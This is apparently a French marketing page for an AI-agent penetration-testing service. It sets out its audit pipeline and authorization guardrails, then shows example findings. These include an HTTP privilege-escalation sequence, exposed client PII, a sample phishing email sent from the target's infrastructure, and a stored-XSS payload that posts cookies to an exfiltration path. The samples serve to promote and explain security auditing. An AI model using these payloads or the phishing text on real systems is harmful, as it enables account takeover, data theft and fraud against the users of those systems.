Méthode

Le pipeline

Là où les scanners du marché s'arrêtent à un dictionnaire de CVE, notre pipeline simule un audit complet par une équipe de pentesters senior. 4 phases coordonnées, 40 agents en parallèle. Le résultat n'est pas comparable.

01

Scope sur mesure

On définit ensemble, noir sur blanc, ce qu'on a le droit d'attaquer : votre site, votre code, vos adresses IP, vos sous-domaines. Tout ce qui compte est couvert, rien ne déborde de ce qui est convenu.

02

Collecte en profondeur

On cartographie tout ce qui est visible de votre cible : pages et parcours du site, code, services exposés, noms de domaine, informations publiques. On reconstitue l'application entière avant la moindre attaque.

03

40 agents en parallèle

40 agents spécialisés attaquent en même temps, chacun sur son terrain : accès et identités, infrastructure, injections, failles de logique métier, enchaînements d'exploitation. Surtout, ils collaborent en temps réel : ce qu'un agent découvre, un autre s'en sert pour aller plus loin. Chacun vaut un consultant senior.

04

Deux rapports

Deux rapports : un technique pour vos équipes (failles, preuves, correctifs) et un conformité pour votre direction : le risque traduit en exposition réglementaire chiffrée (RGPD, ISO 27001, NIS2). Présentable en comité de direction, pas un tableau illisible.

Sécurité

Comment nous opérons en sécurité

On attaque réellement vos systèmes, mais jamais sans cadre. Voici les garde-fous qui protègent votre production à chaque intervention.

Autorisation écrite d'abord

L'attaque ne démarre qu'après votre autorisation écrite (mandat d'audit + DPA), sur un périmètre défini avec vous.

Environnement maîtrisé

Actions réversibles, aucun déni de service, interruption possible à tout moment, aucune altération des données. Attaques non destructives.

Vous gardez le contrôle

Vous décidez du moment et de l'étendue de chaque intervention.

Deux rapports livrés

Un rapport conformité lisible par la direction (CEO/CTO), un rapport technique pour vos équipes (RSSI).

Cas réels

Exemples de findings

takeover · 4.8s
$ # étape 1 : créer un compte
POST /auth/signup → 201 Created
$ # étape 2 : élever le rôle
PATCH /users/me {"role":"admin"} → 200 OK
$ # étape 3 : accès admin
GET /admin/dashboard→ 200 ✓ ADMIN
Critical · Privilege Escalation
01
Critical · Privilege Escalation

Takeover administrateur en 3 requêtes HTTP

Signup public combiné aux RLS UPDATE permissives. Un internaute anonyme devient admin du CRM en quelques secondes. Aucun mot de passe ni invitation requise. Cause racine et 14 autres findings dérivés détectés par l'agent identity.

Demander un audit similaire
SELECT * FROM clients212 / 212 rows
PII complète
GPS exact
408 commandes
Critical · Data Exposure
02
Critical · Data Exposure

Fuite RGPD massive : 212 clients B2B

Absence de filtre user_id dans les RLS SELECT business. 212 clients avec PII complète, coordonnées GPS, 408 commandes, 56 contacts VP exposés à tout authenticated. Violation RGPD sévère, sanction CNIL directe possible.

Demander un audit similaire
De :direction@showroomaugust.fr✓ SPF✓ DKIM
À : 212 clients B2B
Objet : Validation urgente du paiement Q2
Bonjour, suite à un incident sur notre prestataire de paiement, merci de revalider votre RIB en cliquant sur le lien sécurisé ci-dessous avant ce soir 18h.
Revalider mon paiement
Envoyé via Edge Function /send-email · DMARC p=none
Critical · Email Abuse
03
Critical · Email Abuse

Capacité de phishing depuis l'infra légitime

Les Edge Functions email sont accessibles à tout authenticated sans vérification du rôle admin côté serveur. SPF et DKIM légitimes du domaine cible exploitables. Campagnes de fraude crédibles avec DMARC p=none.

Demander un audit similaire
Champ user · prospects.site_web
javascript:fetch('/exfil'{method:'POST',body:document.cookie})
<a href=payload>Visiter le site</a>
Cookie volé au clic du commercial
High · Client-side Attack
04
High · Client-side Attack

Stored XSS via champ utilisateur libre

Payload javascript: rendu sans validation dans une URL utilisateur. RLS INSERT/UPDATE ouverte. Cookie volé dans le contexte d'un commercial qui clique sur la fiche. CSP avec unsafe-inline réduit la protection.

Demander un audit similaire